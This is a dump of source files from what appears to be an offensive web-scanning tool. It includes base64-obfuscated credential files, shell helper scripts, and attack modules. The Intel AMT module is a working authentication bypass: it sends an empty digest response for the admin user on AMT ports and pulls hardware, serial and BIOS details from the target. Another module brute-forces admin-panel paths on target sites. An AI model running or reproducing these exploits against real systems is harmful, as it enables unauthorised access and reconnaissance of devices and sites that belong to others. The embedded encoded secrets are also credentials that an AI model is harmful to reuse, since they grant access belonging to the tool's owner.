--------------------------------------------------------------------------------
/etc/auths/git_auth:
--------------------------------------------------------------------------------
1 | Vm0wd2VHUXhTWGxTV0d4V1YwZG9jRlZ0TVc5V1JteHlWMjVrVmxKc2NEQlVWbU0xVmpBeFYySkVUbHBXVmxwUVZteFZlRll5VGtsaApSbHBYWld4YVRWWnJaRFJaVjAxNFZHNVdhZ3BTYldodlZGWmFjMDB4WkZkWGJVWmFWbXh3V0ZZeU5VdFhRWEJwVWpKb1dsWlVRbGRUCk1WWlhWMjVPVjJKVldsVlpiRnBIVGtaWmVXVkdaRlprTTBKd1ZXcEtiMWRXWkZoa1JtUnJDazFYVWxoWGExcHZZVEZLYzJOR1FsZGkKV0ZJelZqRmFWbVZYVWtoUFYyaHJUVEJLVlZadGRHdE9SbHBYVjJ4b2JGSnRVbkpEYXpGelYydG9WMDF1VW5aV1IzaHJVMFpXZFZGcwpjR2tLVW01Q1NWWkdVa2RWTWsxNFZtNVNVMkpJUWxkV01GWkxWbFphUjFWcmRHbE5WbHBJVjJ0YWExbFdTa2RUYlVaRVlrWnNNMVJzCldtOVdNVm8yVm10NFdGWnNjRXhhUmxwSFkyczVWd3BYYld0TFZXMTBkMU5XV25OVmEyUlhUVlZzTkZadGVITlpWa3B6VTI1S1ZWWXoKUW5WVWJGcEdaVlpzTm1KR1JsWldlbWMxVVRKak9WQlJiejBLCg==:9
--------------------------------------------------------------------------------
/etc/auths/whois_auth:
--------------------------------------------------------------------------------
1 | Vm0wd2QyUXlWa1pOVldScFVtMVNWRll3WkZOVlJscHpWMjVrVlUxV2NEQlVWbU0xWVdzeFYxWnFUbGRpVkVaSVZteFZlRll5VGtWU2JIQk9VakpvVVZadGVHdFRNVTVJVm10a2FsSnVRazlWYlRWRFZWWmtWMVp0UmxSaVZrWTFWVEp3WVZaSFNraGhSemxWVm14YU0xVnNXbUZqVms1WllVWlNUbFpZUWpaV1ZFa3hVakZXZEZOc1dsaGlSa3BoV1ZSR2QwMHhXbGRYYlhScVRWWndNRlZ0ZUd0VWJGcHpZMFJhVjFadFVUQldha1pUWXpGT2NsWnNTbGRTTTAwMQ==:9
--------------------------------------------------------------------------------
/etc/checksum/md5sum.md5:
--------------------------------------------------------------------------------
1 | 685a20fa3fc7652b5c3e39821cdc6f25 ./zeus.py
2 | 4b32db388e8acda35570c734d27c950c ./etc/scripts/launch_sqlmap.sh
3 | 6ad5f22ec4a6f8324bfb1b01ab6d51ec ./etc/scripts/cleanup.sh
4 | 869025acb457dc881e53e440aa11dd7b ./etc/scripts/reinstall.sh
5 | 155c9482f690f1482f324a7ffd8b8098 ./etc/scripts/fix_pie.sh
6 | 0e435c641bc636ac0b3d54e032d9cf6a ./etc/scripts/install_nmap.sh
7 | 440431165b2db8a537c1a93cb2232f16 ./etc/scripts/install_xvfb.sh
8 | 66b11aa388ea909de7b212341259a318 ./etc/auths/git_auth
9 | 8f686b05c5c5dfc02f0fcaa7ebc8677c ./etc/auths/whois_auth
10 | d3ad89703575a712a0aeead2b176d8c5 ./etc/html/clickjacking_test_page.html
11 | 642a77905d8bb4e5533e0e9c2137c0fa ./etc/text_files/agents.txt
12 | 82cc68f46539d0255f7ce14cd86cd49b ./etc/text_files/link_ext.txt
13 | c57ac34fe965961917ac8a207df256d5 ./etc/text_files/dorks.txt
14 | cf85d83da34d70720193d83950c31fdc ./etc/text_files/xss_payloads.txt
15 | 6cabeb9919d2301efc4ba3d8869282d6 ./etc/checksum/md5sum.md5
16 | 5250f0aa13b8af4775efa506e77de1ce ./etc/xml/headers.xml
17 | d41d8cd98f00b204e9800998ecf8427e ./bin/__init__.py
18 | 3be7ee6f4267e0d0cf2143b58792527b ./bin/paths/path_config.ini
19 | fa5084cc7ee56ff2df8631b76be5be4d ./bin/unzip_gecko.py
20 | c0d83f0b82a6b30de8811e69e6d95c61 ./bin/executed.txt
21 | dc1eb4ebe0f372af48b5a9c107ebc68d ./bin/drivers/geckodriver-v0.18.0-linux32.tar.gz
22 | be18faeea6e7db9db6990d8667e2298f ./bin/drivers/geckodriver-v0.17.0-linux64.tar.gz
23 | 79b1a158f96d29942a111c0905f1c807 ./bin/drivers/geckodriver-v0.17.0-linux32.tar.gz
24 | ca6935a72fd0527d15a78a17a35e56e8 ./bin/drivers/geckodriver-v0.19.0-linux64.tar.gz
25 | 4ccb56fb3700005c9f9188f84152f21a ./bin/drivers/geckodriver-v0.18.0-linux64.tar.gz
26 | 07cd383c8aef8ea5ef194a506141afd6 ./bin/drivers/geckodriver-v0.19.0-linux32.tar.gz
27 | 145e4a7dc985e99962dabe3b221fc51e ./lib/tamper_scripts/obfuscateordinal_encode.py
28 | 10bf1bc4ef0287d31633148fab557e8a ./lib/tamper_scripts/uppercase_encode.py
29 | fcef22874b6732fd1b1bd062e18e65db ./lib/tamper_scripts/hex_encode.py
30 | 1537b3b94566aebf0f89bed074e96581 ./lib/tamper_scripts/url_encode.py
31 | d41d8cd98f00b204e9800998ecf8427e ./lib/tamper_scripts/__init__.py
32 | 7b636a332b2e99547ec9565d8e094308 ./lib/tamper_scripts/unicode_encode.py
33 | 07a792bccd13f64873a27aee4aaa8ea6 ./lib/tamper_scripts/space2comment_encode.py
34 | 1053a0c89e514d2c94bc822d34715896 ./lib/tamper_scripts/randomcase_encode.py
35 | 349c30cbab4308bd94829d92b4e34f9d ./lib/tamper_scripts/lowercase_encode.py
36 | 0c5e78674a8d27e7c20af1dca8656789 ./lib/tamper_scripts/enclosebrackets_encode.py
37 | 5824916df46428a8304ee0156bcee989 ./lib/tamper_scripts/multispace2comment_encode.py
38 | 9fd42d65993aa20d1bf5acbc4d042d2e ./lib/tamper_scripts/base64_encode.py
39 | f77b7a9a19b94e26903eeecf5a787ea3 ./lib/tamper_scripts/space2null_encode.py
40 | 3b8c95a6a3b7cecce5118f2fb1ccc6b8 ./lib/tamper_scripts/appendnull_encode.py
41 | 8e8792e38649f18d90bb0084202bb59e ./lib/tamper_scripts/obfuscateentity_encode.py
42 | d41d8cd98f00b204e9800998ecf8427e ./lib/__init__.py
43 | 6299b188a730844954044887f528435a ./lib/firewall/cloudfront.py
44 | d41d8cd98f00b204e9800998ecf8427e ./lib/firewall/__init__.py
45 | 81a29a14d72980a306fbaec0dc772048 ./lib/firewall/fortigate.py
46 | d4986f3d95a773d7c3585b07bcd6310e ./lib/firewall/sucuri.py
47 | 763af6773e920d6bdc185f5bd4df6084 ./lib/firewall/dw.py
48 | e4514021485dbb94c3f0023b04af01ad ./lib/firewall/aws.py
49 | eb3a3066efbcf87dbc10a49be445cb8f ./lib/firewall/urlscan.py
50 | 71744d7a95f42063a8fb6e720932cd3d ./lib/firewall/sonicwall.py
51 | 7af3ee8615c7dc761f050e0ba638eaef ./lib/firewall/armor.py
52 | 1f303641d59686d544f2986ff74c6b31 ./lib/firewall/webseal.py
53 | 78e6b01feb9bad68c2fc8a79e75930fd ./lib/firewall/yundun.py
54 | e4eef006dd909c222b1b9f48826c3ef5 ./lib/firewall/pk.py
55 | bf5285dc059c761e1719bc734ae8504f ./lib/firewall/varnish.py
56 | 6b370050b40d8c1d2221424f756c7842 ./lib/firewall/paloalto.py
57 | 73c1727e604ec6e00541687bfc64c0d6 ./lib/firewall/akamai.py
58 | 6bbe2f6f6a2a1ddf0e416e94ec1f0763 ./lib/firewall/siteguard.py
59 | 787e21ed577ff05b095aa0f0e5e5e9bf ./lib/firewall/cloudflare.py
60 | c3f01fc8ff7dfe7759f63bf16b00f127 ./lib/firewall/wordfence.py
61 | 2f0a935d2bb9b8aa711e511f48595a81 ./lib/firewall/powerful.py
62 | bbd8b4c6100070d420d48dc7dfc297eb ./lib/firewall/webknight.py
63 | 54815706261c32b57fbbdc99244b5cdd ./lib/firewall/modsecurity.py
64 | 9070b43428bd17fd5faf86995cb559a2 ./lib/firewall/stringray.py
65 | 5ee20e2c158d0734b4dd5a8eb47f8ea5 ./lib/firewall/squid.py
66 | 95b908a21c0ff456ae59df4c6c189c54 ./lib/firewall/wallarm.py
67 | cb45428e92485b759ff5cb46a0be9c73 ./lib/firewall/yunsuo.py
68 | 8fc8d62377bebbfa7ca4d70a79eab115 ./lib/firewall/bigip.py
69 | 6ea65a0160c21e144e92334acc2e3667 ./lib/firewall/anquanbao.py
70 | 22a0ad8f2fa1a16b651cb5ae37ca9b0d ./lib/firewall/generic.py
71 | ed18ed1f72f3887e63fa7ce060841e4a ./lib/plugins/aardvark.py
72 | a8b3e6924bab72607b1d1c1a8dcb561d ./lib/plugins/4d.py
73 | 03355a122c047dc598fc271620119978 ./lib/plugins/jquery.py
74 | d41d8cd98f00b204e9800998ecf8427e ./lib/plugins/__init__.py
75 | 353db8b22c031433ea73a12943927557 ./lib/plugins/clipbucket.py
76 | 5908a81cc9b332348b26a3ccd5ddb798 ./lib/plugins/ihtml.py
77 | d76d2839ed8875739328bb5f2a838ba6 ./lib/plugins/360.py
78 | 16e4708c510811760129f6fb4842e92e ./lib/plugins/3dcart.py
79 | 2ce0a2101bb5706a136de83a729965f3 ./lib/plugins/b2evolution.py
80 | 497facc7b12e6e691aab65980d8f5026 ./lib/plugins/bmcremedy.py
81 | 2dcee5bc924732dd21f16983eef9a99d ./lib/plugins/abyss.py
82 | d2c100e6e6f7fbda8448d36a6928c979 ./lib/plugins/68classified.py
83 | f1eb201cce16853049a615805b01bc60 ./lib/plugins/bomgar.py
84 | ce3b79dc80e369ffd55d2cbe90e6a0ab ./lib/plugins/mssqlreportmanager.py
85 | 55ec8cde9d438a90327911910164abf2 ./lib/plugins/opengraph.py
86 | 8658f8a185499ec6d10b1d2da6104c27 ./lib/plugins/atomfeed.py
87 | c2533d4a8dc5fdaa4b8d584588b32ec2 ./lib/plugins/html5.py
88 | a3ed012f11ff2bffbc143fbef63d0c12 ./lib/plugins/3com.py
89 | 55d834ae87e96787807e21b65ec68bca ./lib/plugins/moodle.py
90 | 44019a327ec1db91851d652630788742 ./lib/plugins/googleapi.py
91 | c4ac50a3f3550c62219e7e4f38d4b496 ./lib/plugins/1024.py
92 | 0b63885649f369ea410c8169e947fdab ./lib/plugins/accellion.py
93 | 76a1d1decfb872bfafdf510c656f113a ./lib/plugins/rssfeed.py
94 | 320f0db977c85b477ba1ea78b140cb8a ./lib/plugins/4images.py
95 | 35dc8b7da4becb60662aab3c48a9210b ./lib/plugins/openxchange.py
96 | bdb7ff546787d38bbbd0aac9d4a4cdf8 ./lib/attacks/clickjacking_scan/__init__.py
97 | d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/__init__.py
98 | 6e9e0a9e2c72e00d8690c0177b695d56 ./lib/attacks/sqlmap_scan/__init__.py
99 | 5e5bb575014ebe613db6bf671d008cf8 ./lib/attacks/sqlmap_scan/sqlmap_opts.py
100 | d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/whois_lookup/__init__.py
101 | c5b69617f040fef1d5930948905aa8d0 ./lib/attacks/whois_lookup/whois.py
102 | 4fd96bb3002e949687d7ae863ee87264 ./lib/attacks/admin_panel_finder/__init__.py
103 | 2017e69c3420c9e240fccb310f086da7 ./lib/attacks/xss_scan/__init__.py
104 | 40ba04fb18dcbb81cb42376a825c238f ./lib/attacks/nmap_scan/__init__.py
105 | 216999fa0e84866d5c1d96d5676034e4 ./lib/attacks/nmap_scan/nmap_opts.py
106 | 0114ebe3d45612ef143f2777f027374c ./lib/header_check/__init__.py
107 | 2a8acb2191d80da75f0e4d09c00df9f6 ./lib/core/common.py
108 | de4254c5e40f7aa4fb81e0608f758a2c ./lib/core/decorators.py
109 | 3f045c64ef155a517b7a3f3b66905325 ./lib/core/errors.py
110 | d41d8cd98f00b204e9800998ecf8427e ./lib/core/__init__.py
111 | 0faeed8eac30526f3751dd67fe5c9f7e ./lib/core/settings.py
112 | 27bce5d5d1e7d01788c5273016b19370 ./lib/core/parse.py
113 | d41d8cd98f00b204e9800998ecf8427e ./var/__init__.py
114 | d41d8cd98f00b204e9800998ecf8427e ./var/auto_issue/__init__.py
115 | c58e73857e42a07fa6eb559433b32c1a ./var/auto_issue/github.py
116 | 503e44b36f0bcd81e20840be5b73320e ./var/search/__init__.py
117 | c52867e57beeeeac2da57f597b644faf ./var/search/selenium_search.py
118 | 12340de27a75273cd444f7257d354311 ./var/search/pgp_search.py
119 | 0af5ab455a535a2f141cfae4758a4bb4 ./var/blackwidow/__init__.py
--------------------------------------------------------------------------------
/etc/deprecated/intel_me/__init__.py:
--------------------------------------------------------------------------------
1 | # Intel AMT bypass scanner is being deprecated and will be completely removed by version 1.3
2 | # the reason for the deprecation is that it serves really no purpose. You will most likely
3 | # not find a vulnerability from a webpage with this attack assessment.
4 | # The code will stay but will be moved to a new folder under etc, that will be called
5 | # deprecated
6 | # TODO:/ move code into deprecated folder
7 |
8 | import json
9 | import re
10 | import socket
11 |
12 | import requests
13 |
14 | import lib.core.settings
15 |
16 | from lxml import html
17 | from var.auto_issue.github import request_issue_creation
18 |
19 |
20 | def __get_auth_headers(target, port, **kwargs):
21 | """
22 | get the authorization headers from the URL
23 | """
24 | source = kwargs.get("source", None)
25 | proxy, agent, verbose = kwargs.get("proxy", None), kwargs.get("agent", None), kwargs.get("verbose", False)
26 | if not source or 'WWW-Authenticate' not in source.headers:  # check the header map itself, not a value inside it
27 | lib.core.settings.logger.info(lib.core.settings.set_color(
28 | "header value not established, attempting to get bypass..."
29 | ))
30 | source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
31 | 'connection': 'close', 'user-agent': agent
32 | }, proxies=proxy)
33 | return source
34 | # Get digest and nonce and return the new header
35 | elif 'WWW-Authenticate' in source.headers:
36 | lib.core.settings.logger.info(lib.core.settings.set_color(
37 | "header value established successfully, attempting authentication..."
38 | ))
39 | data = re.compile('Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"').search(
40 | source.headers['WWW-Authenticate'])
41 | digest = data.group(1)
42 | nonce = data.group(2)
43 | return 'Digest username="admin", ' \
44 | 'realm="Digest:{0}", nonce="{1}", ' \
45 | 'uri="/index.htm", response="", qop=auth, ' \
46 | 'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
47 | else:
48 | lib.core.settings.logger.info(lib.core.settings.set_color(
49 | "nothing found, will skip URL..."
50 | ))
51 | return None
52 |
53 |
54 | def __get_raw_data(target, page, port, agent=None, proxy=None, **kwargs):
55 | """
56 | collect all the information from an exploitable target
57 | """
58 | verbose = kwargs.get("verbose", False)
59 | lib.core.settings.logger.info(lib.core.settings.set_color(
60 | "attempting to get raw hardware information..."
61 | ))
62 | return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
63 | headers={
64 | 'connection': 'close',
65 | 'Authorization': __get_auth_headers(target, port, verbose=verbose),
66 | 'user-agent': agent
67 | }, proxies=proxy)
68 |
69 |
70 | def __get_hardware(target, port, agent=None, proxy=None, verbose=False):
71 | """
72 | collect all the hardware information from an exploitable target
73 | """
74 | req = __get_raw_data(target, 'hw-sys', port, agent=agent, proxy=proxy, verbose=verbose)
75 | if not req.status_code == 200:
76 | return None
77 | lib.core.settings.logger.info(lib.core.settings.set_color(
78 | "connected successfully getting hardware info..."
79 | ))
80 | tree = html.fromstring(req.content)
81 | raw = tree.xpath('//td[@class="r1"]/text()')
82 | bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
83 | # find the hardware information
84 | # and output the hardware data
85 | # from the raw data found
86 | data = {
87 | 'platform': {
88 | 'model': raw[0],
89 | 'manufacturer': raw[1],
90 | 'version': raw[2],
91 | 'serial': raw[4],
92 | 'system_id': raw[5]
93 | },
94 | 'baseboard': {
95 | 'manufacturer': raw[6],
96 | 'name': raw[7],
97 | 'version': raw[8],
98 | 'serial': raw[9],
99 | 'tag': raw[10],
100 | 'replaceable': raw[11]
101 | },
102 | 'bios': {
103 | 'vendor': raw[12],
104 | 'version': raw[13],
105 | 'date': raw[14],
106 | 'functions': bios_functions
107 | }
108 | }
109 | return data  # hand back the dict itself; main_intel_amt() iterates it as one
110 |
111 |
112 | def main_intel_amt(url, agent=None, proxy=None, **kwargs):
113 | """
114 | main attack method to be called
115 | """
116 | do_ip_address = kwargs.get("do_ip", False)
117 | verbose = kwargs.get("verbose", False)
118 | proxy = lib.core.settings.proxy_string_to_dict(proxy) or None
119 | agent = agent or lib.core.settings.DEFAULT_USER_AGENT
120 | port_list = (16993, 16992, 693, 692)
121 | if do_ip_address:
122 | lib.core.settings.logger.warning(lib.core.settings.set_color(
123 | "running against IP addresses may result in the targets refusing the connection...", level=30
124 | ))
125 | lib.core.settings.logger.info(lib.core.settings.set_color(
126 | "will run against IP address instead of hostname..."
127 | ))
128 | try:
129 | url = lib.core.settings.replace_http(url)
130 | url = "http://{}".format(socket.gethostbyname(url))
131 | lib.core.settings.logger.info(lib.core.settings.set_color(
132 | "discovered IP address {}...".format(url)
133 | ))
134 | except Exception as e:
135 | lib.core.settings.logger.error(lib.core.settings.set_color(
136 | "failed to gather IP address from hostname '{}', received an error '{}'. "
137 | "will just run against hostname...".format(url, e), level=40
138 | ))
139 | # fall back to the plain hostname
140 | lib.core.settings.logger.info(lib.core.settings.set_color(
141 | "attempting to connect to '{}' and get hardware info...".format(url)
142 | ))
143 | for port in list(port_list):
144 | if verbose:
145 | lib.core.settings.logger.debug(lib.core.settings.set_color(
146 | "trying on port {}...".format(port), level=10
147 | ))
148 | try:
149 | json_data = __get_hardware(url, port, agent=agent, proxy=proxy, verbose=verbose)
150 | if json_data is None:
151 | lib.core.settings.logger.error(lib.core.settings.set_color(
152 | "unable to get any information, skipping...", level=40
153 | ))
154 | pass
155 | else:
156 | print("-" * 40)
157 | for key in json_data.keys():
158 | print("{}:".format(str(key).capitalize()))
159 | for item in json_data[key]:
160 | print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
161 | print("-" * 40)
162 | except requests.exceptions.ConnectionError as e:
163 | if "Max retries exceeded with url" in str(e):
164 | lib.core.settings.logger.error(lib.core.settings.set_color(
165 | "failed connection, target machine is actively refusing the connection, skipping...", level=40
166 | ))
167 | pass
168 | else:
169 | lib.core.settings.logger.error(lib.core.settings.set_color(
170 | "failed connection with '{}', skipping...", level=40
171 | ))
172 | pass
173 | except Exception as e:
174 | if "Temporary failure in name resolution" in str(e):
175 | lib.core.settings.logger.error(lib.core.settings.set_color(
176 | "failed to connect on '{}', skipping...".format(url), level=40
177 | ))
178 | pass
179 | else:
180 | lib.core.settings.logger.exception(lib.core.settings.set_color(
181 | "ran into exception '{}', cannot continue...".format(e), level=50
182 | ))
183 | request_issue_creation()
184 |
--------------------------------------------------------------------------------
/etc/html/clickjacking_test_page.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/etc/scripts/cleanup.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | for pid in $(ps -ef | grep "firefox" | awk '{print $2}'); do kill -9 ${pid}; done > /dev/null 2>&1
--------------------------------------------------------------------------------
/etc/scripts/fix_pie.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | sudo rm -rf /tmp/.X0-lock  # remove the stale X display lock; the original /tmp.x0-lock path appears to be a typo
4 | sudo apt-get purge --yes --force-yes xvfb
5 | sudo apt-get install --yes --force-yes xvfb
--------------------------------------------------------------------------------
/etc/scripts/install_nmap.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | sudo apt-get install nmap
--------------------------------------------------------------------------------
/etc/scripts/install_xvfb.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 |
4 | sudo apt-get install xvfb --yes > /dev/null 2>&1
--------------------------------------------------------------------------------
/etc/scripts/launch_sqlmap.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | USR_PATH=$2  # the caller (lib/attacks/sqlmap_scan) passes a filler first argument, so the sqlmap path arrives as $2
4 |
5 | python "$USR_PATH/sqlmapapi.py" -s
--------------------------------------------------------------------------------
/etc/scripts/reinstall.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | for pid in $(ps -ef | grep "firefox" | awk '{print $2}'); do kill -9 ${pid}; done > /dev/null 2>&1
4 | mv ~/.mozilla ~/.mozilla.old > /dev/null 2>&1
5 | rm /usr/lib/firefox* > /dev/null 2>&1
6 | sudo apt-get update > /dev/null 2>&1
7 | sudo apt-get --purge --reinstall --assume-yes install firefox=56.0 > /dev/null 2>&1
8 | sudo pip2 install selenium -U > /dev/null 2>&1
9 |
--------------------------------------------------------------------------------
/etc/xml/headers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/attacks/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/admin_panel_finder/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import threading
3 |
4 | try: # Python 3
5 | from urllib.request import urlopen
6 | from urllib.error import HTTPError
7 | except ImportError: # Python 2
8 | from urllib2 import urlopen, HTTPError
9 |
10 | from requests.exceptions import (
11 | ConnectionError,
12 | TooManyRedirects,
13 | ReadTimeout
14 | )
15 |
16 | import lib.core.common
17 | import lib.core.settings
18 | from var.auto_issue.github import request_issue_creation
19 |
20 |
21 | def check_for_externals(url, data_sep="-" * 30, **kwargs):
22 | """
23 | check if the URL has a robots.txt in it and collect `interesting` information
24 | out of the page
25 | """
26 | robots = kwargs.get("robots", False)
27 | sitemap = kwargs.get("sitemap", False)
28 | verbose = kwargs.get("verbose", False)
29 | batch = kwargs.get("batch", False)
30 |
31 | ext = {
32 | robots: "/robots.txt",
33 | sitemap: "/sitemap.xml"
34 | }
35 | currently_searching = ext[robots if robots else sitemap]  # the dict is keyed on the flags themselves, so the set flag selects its path
36 | if verbose:
37 | lib.core.settings.logger.debug(lib.core.settings.set_color(
38 | "currently searching for a '{}'".format(currently_searching), level=10
39 | ))
40 |
41 | try:
42 | url = lib.core.settings.replace_http(url)
43 | full_url = "{}{}{}".format("http://", url, currently_searching)
44 | _, code, data, _ = lib.core.common.get_page(full_url)
45 | except (TooManyRedirects, ConnectionError, ReadTimeout):
46 | lib.core.settings.logger.error(lib.core.settings.set_color(
47 | "connection to '{}' failed, assuming does not exist and continuing".format(full_url), level=40
48 | ))
49 | return False
50 |
51 | if code == 404:
52 | lib.core.settings.logger.error(lib.core.settings.set_color(
53 | "unable to connect to '{}', assuming does not exist and continuing".format(
54 | full_url
55 | ), level=40
56 | ))
57 | return False
58 | if robots:
59 | interesting = set()
60 | for line in data.split("\n"):
61 | if "Allow" in line:
62 | interesting.add(line.strip())
63 | if len(interesting) > 0:
64 | lib.core.settings.create_tree(full_url, list(interesting))
65 | else:
66 | question_msg = "nothing interesting found in robots.txt, would you like to display the entire page"
67 | if not batch:
68 | to_display = lib.core.common.prompt(
69 | question_msg, opts="yN"
70 | )
71 | else:
72 | to_display = lib.core.common.prompt(
73 | question_msg, opts="yN", default="n"
74 | )
75 |
76 | if to_display.lower().startswith("y"):
77 | print(
78 | "{}\n{}\n{}".format(
79 | data_sep, data, data_sep
80 | )
81 | )
82 | lib.core.settings.logger.info(lib.core.settings.set_color(
83 | "robots.txt page will be saved into a file", level=25
84 | ))
85 | return lib.core.common.write_to_log_file(
86 | data, lib.core.settings.ROBOTS_PAGE_PATH, lib.core.settings.ROBOTS_TXT_FILENAME.format(
87 | lib.core.settings.replace_http(url)
88 | )
89 | )
90 | elif sitemap:
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "found a sitemap, saving to file", level=25
93 | ))
94 | return lib.core.common.write_to_log_file(
95 | data, lib.core.settings.SITEMAP_FILE_LOG_PATH, lib.core.settings.SITEMAP_FILENAME.format(
96 | lib.core.settings.replace_http(url)
97 | )
98 | )
99 |
100 |
101 | def check_for_admin_page(url, exts, protocol="http://", **kwargs):
102 | """
103 | bruteforce the admin page of given URL
104 | """
105 | verbose = kwargs.get("verbose", False)
106 | show_possibles = kwargs.get("show_possibles", False)
107 | possible_connections, connections = set(), set()
108 | stripped_url = lib.core.settings.replace_http(str(url).strip())
109 | for ext in exts:
110 | # the extension list is loaded once before this process begins
111 | # and passed in, rather than re-read from disk on every attempt,
112 | # to save time while running
113 | ext = ext.strip()
114 | true_url = "{}{}{}".format(protocol, stripped_url, ext)
115 | if verbose:
116 | lib.core.settings.logger.debug(lib.core.settings.set_color(
117 | "trying '{}'".format(true_url), level=10
118 | ))
119 | try:
120 | urlopen(true_url, timeout=5)
121 | lib.core.settings.logger.info(lib.core.settings.set_color(
122 | "connected successfully to '{}'".format(true_url), level=25
123 | ))
124 | connections.add(true_url)
125 | except HTTPError as e:
126 | data = str(e).split(" ")
127 | if verbose:
128 | if "Access Denied" in str(e):
129 | lib.core.settings.logger.warning(lib.core.settings.set_color(
130 | "got access denied, possible control panel found without external access on '{}'".format(
131 | true_url
132 | ),
133 | level=30
134 | ))
135 | possible_connections.add(true_url)
136 | else:
137 | for error_code in lib.core.common.STATUS_CODES.keys():  # keys() works on both python 2 and 3
138 | if int(data[2].split(":")[0]) == error_code:
139 | lib.core.settings.logger.error(lib.core.settings.set_color(
140 | "failed to connect got error code {} (reason: {})".format(
141 | data[2], lib.core.common.STATUS_CODES[error_code]
142 | ), level=40
143 | ))
144 | except Exception as e:
145 | if verbose:
146 | if "" or "timeout: timed out" in str(e):
147 | lib.core.settings.logger.warning(lib.core.settings.set_color(
148 | "connection timed out assuming won't connect and skipping", level=30
149 | ))
150 | else:
151 | lib.core.settings.logger.exception(lib.core.settings.set_color(
152 | "failed to connect with unexpected error '{}'".format(str(e)), level=50
153 | ))
154 | request_issue_creation()
155 | possible_connections, connections = list(possible_connections), list(connections)
156 | data_msg = "found {} possible connection(s) and {} successful connection(s)"
157 | lib.core.settings.logger.info(lib.core.settings.set_color(
158 | data_msg.format(len(possible_connections), len(connections))
159 | ))
160 | if len(connections) > 0:
161 | # create the connection tree if we got some connections
162 | lib.core.settings.logger.info(lib.core.settings.set_color(
163 | "creating connection tree"
164 | ))
165 | lib.core.settings.create_tree(url, connections)
166 | else:
167 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
168 | "did not receive any successful connections to the admin page of "
169 | "{}".format(url), level=50
170 | ))
171 | if show_possibles:
172 | if len(possible_connections) > 0:
173 | lib.core.settings.logger.info(lib.core.settings.set_color(
174 | "creating possible connection tree"
175 | ))
176 | lib.core.settings.create_tree(url, possible_connections)
177 | else:
178 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
179 | "did not find any possible connections to {}'s "
180 | "admin page".format(url), level=50
181 | ))
182 | if len(connections) > 0:
183 | lib.core.settings.logger.warning(lib.core.settings.set_color(
184 | "only writing successful connections to log file", level=30
185 | ))
186 | lib.core.common.write_to_log_file(
187 | list(connections),
188 | lib.core.settings.ADMIN_PAGE_FILE_PATH,
189 | lib.core.settings.ADMIN_PAGE_FILENAME.format(
190 | lib.core.settings.replace_http(url)
191 | )
192 | )
193 |
194 |
195 | def __load_extensions(filename="{}/etc/text_files/link_ext.txt"):
196 | """
197 | load the extensions to use from the etc/link_ext file
198 | """
199 | # this is where the extensions are loaded from
200 | with open(filename.format(os.getcwd())) as ext:
201 | return ext.readlines()
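# readlines() keeps the trailing newlines; check_for_admin_page() strips each
# extension before building the candidate URL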
202 |
203 |
204 | def main(url, show=False, verbose=False, **kwargs):
205 | """
206 | main method to be called
207 | """
208 | do_threading = kwargs.get("do_threading", False)
209 | proc_num = kwargs.get("proc_num", 5)
210 | batch = kwargs.get("batch", False)
211 |
212 | try:
213 | lib.core.settings.logger.info(lib.core.settings.set_color(
214 | "parsing robots.txt"
215 | ))
216 | results = check_for_externals(url, robots=True, batch=batch)
217 | if not results:
218 | lib.core.settings.logger.warning(lib.core.settings.set_color(
219 | "seems like this page is either blocking access to robots.txt or it does not exist", level=30
220 | ))
221 | lib.core.settings.logger.info(lib.core.settings.set_color(
222 | "checking for a sitemap"
223 | ))
224 | check_for_externals(url, sitemap=True)
225 | lib.core.settings.logger.info(lib.core.settings.set_color(
226 | "loading extensions"
227 | ))
228 | extensions = __load_extensions()
229 | if verbose:
230 | lib.core.settings.logger.debug(lib.core.settings.set_color(
231 | "loaded a total of {} extensions".format(len(extensions)), level=10
232 | ))
233 | lib.core.settings.logger.info(lib.core.settings.set_color(
234 | "attempting to bruteforce admin panel"
235 | ))
236 | if do_threading:
237 | lib.core.settings.logger.warning(lib.core.settings.set_color(
238 | "starting {} threads, you will not be able to end the process until "
239 | "it is completed".format(proc_num), level=30
240 | ))
241 | tasks = []
242 | for _ in range(0, proc_num):
243 | t = threading.Thread(target=check_for_admin_page, args=(url, extensions), kwargs={
244 | "verbose": verbose,
245 | "show_possibles": show
246 | })
247 | t.daemon = True
248 | tasks.append(t)
249 | for thread in tasks:
250 | thread.start()
251 | for thread in tasks: thread.join()  # join in a second pass so the threads actually run concurrently
252 | else:
253 | check_for_admin_page(url, extensions, show_possibles=show, verbose=verbose)
254 | except KeyboardInterrupt:
255 | if not lib.core.common.pause():
256 | lib.core.common.shutdown()
--------------------------------------------------------------------------------
/lib/attacks/clickjacking_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import lib.core.common
2 | import lib.core.settings
3 | import var.auto_issue.github
4 |
5 |
6 | class ClickJackingScanner(object):
7 |
8 | def __init__(self, url):
9 | self.url = url
